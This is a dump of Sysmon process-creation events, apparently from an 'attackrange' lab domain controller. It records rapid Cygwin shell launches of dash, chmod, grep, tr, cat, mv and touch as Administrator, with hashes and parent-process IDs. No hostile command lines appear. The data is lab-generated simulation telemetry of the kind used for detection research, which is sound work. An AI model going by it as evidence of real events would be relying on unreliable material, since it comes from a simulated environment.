14:55:58.052{A8622C2F-53FE-6078-9C0A-00000000AE01}924C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052924Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.044{A8622C2F-53FE-6078-9B0A-00000000AE01}5412C:\cygwin64\bin\chmod.exe-----"C:\cygwin64\bin\chmod.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8AA9088BCFED8D8FD4BA76E7519E4BB0,SHA256=72361EA8D44BDA63AC38BD391E3B954ED31FA8CA95ED36C8A0F1E11173A81990,IMPHASH=FECD2F385A3CB58836549F798D62B9A3{A8622C2F-53FE-6078-9A0A-00000000AE01}6196C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052914Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.036{A8622C2F-53FE-6078-9A0A-00000000AE01}6196C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052904Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.015{A8622C2F-53FE-6078-990A-00000000AE01}5828C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FE-6078-980A-00000000AE01}5404C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052894Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:58.007{A8622C2F-53FE-6078-980A-00000000AE01}5404C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052882Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.999{A8622C2F-53FD-6078-970A-00000000AE01}3208C:\cygwin64\bin\tr.exe-----"C:\cygwin64\bin\tr.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=65789252526C9B5F8A73D99D53C2CC58,SHA256=464DA547E4E2B9B5E5E3C7B4773820257AAA39BCF85318B5CE86443E6EA5F3C7,IMPHASH=CDDCB078A4D97440CAEF0552021BCA5C{A8622C2F-53FD-6078-950A-00000000AE01}5860C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052864Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.991{A8622C2F-53FD-6078-960A-00000000AE01}3176C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FD-6078-940A-00000000AE01}3008C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052862Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.991{A8622C2F-53FD-6078-950A-00000000AE01}5860C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FD-6078-930A-00000000AE01}6968C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052852Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.984{A8622C2F-53FD-6078-940A-00000000AE01}3008C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FD-6078-930A-00000000AE01}6968C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052840Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.976{A8622C2F-53FD-6078-930A-00000000AE01}6968C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052828Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.968{A8622C2F-53FD-6078-920A-00000000AE01}3200C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FD-6078-910A-00000000AE01}1408C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052818Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.961{A8622C2F-53FD-6078-910A-00000000AE01}1408C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052806Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.952{A8622C2F-53FD-6078-900A-00000000AE01}1496C:\cygwin64\bin\mv.exe-----"C:\cygwin64\bin\mv.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9C3FAC81E10B930A3218459438012345,SHA256=65D525AA50EFE6EE796887C76E8F0E6B99D216018506BB59BF32562C3D32C071,IMPHASH=9C18D209F9C5FB9FE70B2F2187E63FC4{A8622C2F-53FD-6078-8F0A-00000000AE01}5396C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052796Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.945{A8622C2F-53FD-6078-8F0A-00000000AE01}5396C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052786Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.936{A8622C2F-53FD-6078-8E0A-00000000AE01}1476C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FD-6078-8D0A-00000000AE01}6268C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052776Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.929{A8622C2F-53FD-6078-8D0A-00000000AE01}6268C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052766Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.921{A8622C2F-53FD-6078-8C0A-00000000AE01}5052C:\cygwin64\bin\chmod.exe-----"C:\cygwin64\bin\chmod.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8AA9088BCFED8D8FD4BA76E7519E4BB0,SHA256=72361EA8D44BDA63AC38BD391E3B954ED31FA8CA95ED36C8A0F1E11173A81990,IMPHASH=FECD2F385A3CB58836549F798D62B9A3{A8622C2F-53FD-6078-8B0A-00000000AE01}5332C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052756Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.913{A8622C2F-53FD-6078-8B0A-00000000AE01}5332C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052746Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.905{A8622C2F-53FD-6078-8A0A-00000000AE01}3912C:\cygwin64\bin\touch.exe-----"C:\cygwin64\bin\touch.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=B77F237C5CCC4E8AEFEBB51610AA86B6,SHA256=E3F5B7A0F6C406E4C04BE6E14BAFCA27F1BC7A5299BC7151B9604B58057E0D66,IMPHASH=CA44AAF41C04E9C1E85EC55456ECCF59{A8622C2F-53FD-6078-890A-00000000AE01}1628C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052736Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.898{A8622C2F-53FD-6078-890A-00000000AE01}1628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052726Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.889{A8622C2F-53FD-6078-880A-00000000AE01}5516C:\cygwin64\bin\chmod.exe-----"C:\cygwin64\bin\chmod.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8AA9088BCFED8D8FD4BA76E7519E4BB0,SHA256=72361EA8D44BDA63AC38BD391E3B954ED31FA8CA95ED36C8A0F1E11173A81990,IMPHASH=FECD2F385A3CB58836549F798D62B9A3{A8622C2F-53FD-6078-870A-00000000AE01}5412C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052716Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.882{A8622C2F-53FD-6078-870A-00000000AE01}5412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052706Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.870{A8622C2F-53FD-6078-860A-00000000AE01}3420C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FD-6078-850A-00000000AE01}5828C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052696Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.863{A8622C2F-53FD-6078-850A-00000000AE01}5828C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052684Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.854{A8622C2F-53FD-6078-840A-00000000AE01}3208C:\cygwin64\bin\tr.exe-----"C:\cygwin64\bin\tr.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=65789252526C9B5F8A73D99D53C2CC58,SHA256=464DA547E4E2B9B5E5E3C7B4773820257AAA39BCF85318B5CE86443E6EA5F3C7,IMPHASH=CDDCB078A4D97440CAEF0552021BCA5C{A8622C2F-53FD-6078-820A-00000000AE01}1348C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052666Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.846{A8622C2F-53FD-6078-830A-00000000AE01}5312C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FD-6078-810A-00000000AE01}3008C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052664Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.846{A8622C2F-53FD-6078-820A-00000000AE01}1348C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FD-6078-800A-00000000AE01}6084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052654Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.839{A8622C2F-53FD-6078-810A-00000000AE01}3008C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53FD-6078-800A-00000000AE01}6084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052642Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.832{A8622C2F-53FD-6078-800A-00000000AE01}6084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052630Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.823{A8622C2F-53FD-6078-7F0A-00000000AE01}6808C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FD-6078-7E0A-00000000AE01}3200C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052619Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.816{A8622C2F-53FD-6078-7E0A-00000000AE01}3200C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052607Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.806{A8622C2F-53FD-6078-7D0A-00000000AE01}6452C:\cygwin64\bin\mv.exe-----"C:\cygwin64\bin\mv.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=9C3FAC81E10B930A3218459438012345,SHA256=65D525AA50EFE6EE796887C76E8F0E6B99D216018506BB59BF32562C3D32C071,IMPHASH=9C18D209F9C5FB9FE70B2F2187E63FC4{A8622C2F-53FD-6078-7C0A-00000000AE01}1536C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052597Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.799{A8622C2F-53FD-6078-7C0A-00000000AE01}1536C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052587Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.790{A8622C2F-53FD-6078-7B0A-00000000AE01}3156C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FD-6078-7A0A-00000000AE01}5776C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052577Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.783{A8622C2F-53FD-6078-7A0A-00000000AE01}5776C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052567Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.774{A8622C2F-53FD-6078-790A-00000000AE01}6852C:\cygwin64\bin\chmod.exe-----"C:\cygwin64\bin\chmod.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8AA9088BCFED8D8FD4BA76E7519E4BB0,SHA256=72361EA8D44BDA63AC38BD391E3B954ED31FA8CA95ED36C8A0F1E11173A81990,IMPHASH=FECD2F385A3CB58836549F798D62B9A3{A8622C2F-53FD-6078-780A-00000000AE01}4384C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052557Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.767{A8622C2F-53FD-6078-780A-00000000AE01}4384C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052547Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.758{A8622C2F-53FD-6078-770A-00000000AE01}6240C:\cygwin64\bin\touch.exe-----"C:\cygwin64\bin\touch.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=B77F237C5CCC4E8AEFEBB51610AA86B6,SHA256=E3F5B7A0F6C406E4C04BE6E14BAFCA27F1BC7A5299BC7151B9604B58057E0D66,IMPHASH=CA44AAF41C04E9C1E85EC55456ECCF59{A8622C2F-53FD-6078-760A-00000000AE01}924C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052537Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.751{A8622C2F-53FD-6078-760A-00000000AE01}924C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052527Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.742{A8622C2F-53FD-6078-750A-00000000AE01}6336C:\cygwin64\bin\chmod.exe-----"C:\cygwin64\bin\chmod.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=8AA9088BCFED8D8FD4BA76E7519E4BB0,SHA256=72361EA8D44BDA63AC38BD391E3B954ED31FA8CA95ED36C8A0F1E11173A81990,IMPHASH=FECD2F385A3CB58836549F798D62B9A3{A8622C2F-53FD-6078-740A-00000000AE01}6196C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052517Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.735{A8622C2F-53FD-6078-740A-00000000AE01}6196C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052507Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:57.727{A8622C2F-53FD-6078-730A-00000000AE01}7140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000052495Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 